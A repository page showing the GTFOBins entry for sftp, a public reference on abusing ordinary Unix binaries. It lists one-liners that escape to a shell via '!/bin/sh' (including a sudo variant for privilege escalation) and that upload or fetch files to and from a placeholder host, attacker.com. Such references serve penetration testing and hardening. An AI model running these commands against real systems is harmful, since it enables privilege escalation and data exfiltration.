This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
2da69686ac2b1bfaa2d5fa1191a5882616be00c7
GTFOBins.github.io
/
_gtfobins
/
sftp.md
Emilio Pinna
7e5bcab249
Replace where_to_save with file_to_save
2018-06-04 18:53:35 +01:00
564 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
upload
download
code
HOST=user@attacker.com
sftp $HOST !/bin/sh
code
HOST=user@attacker.com
sudo sftp $HOST !/bin/sh
description
code
Send local file to a SSH server.
RHOST=user@attacker.com
sftp $RHOST put file_to_send file_to_save
description
code
Fetch a remote file from a SSH server.
RHOST=user@attacker.com
sftp $RHOST get file_to_get file_to_save
Reference in New Issue
View Git Blame
Copy Permalink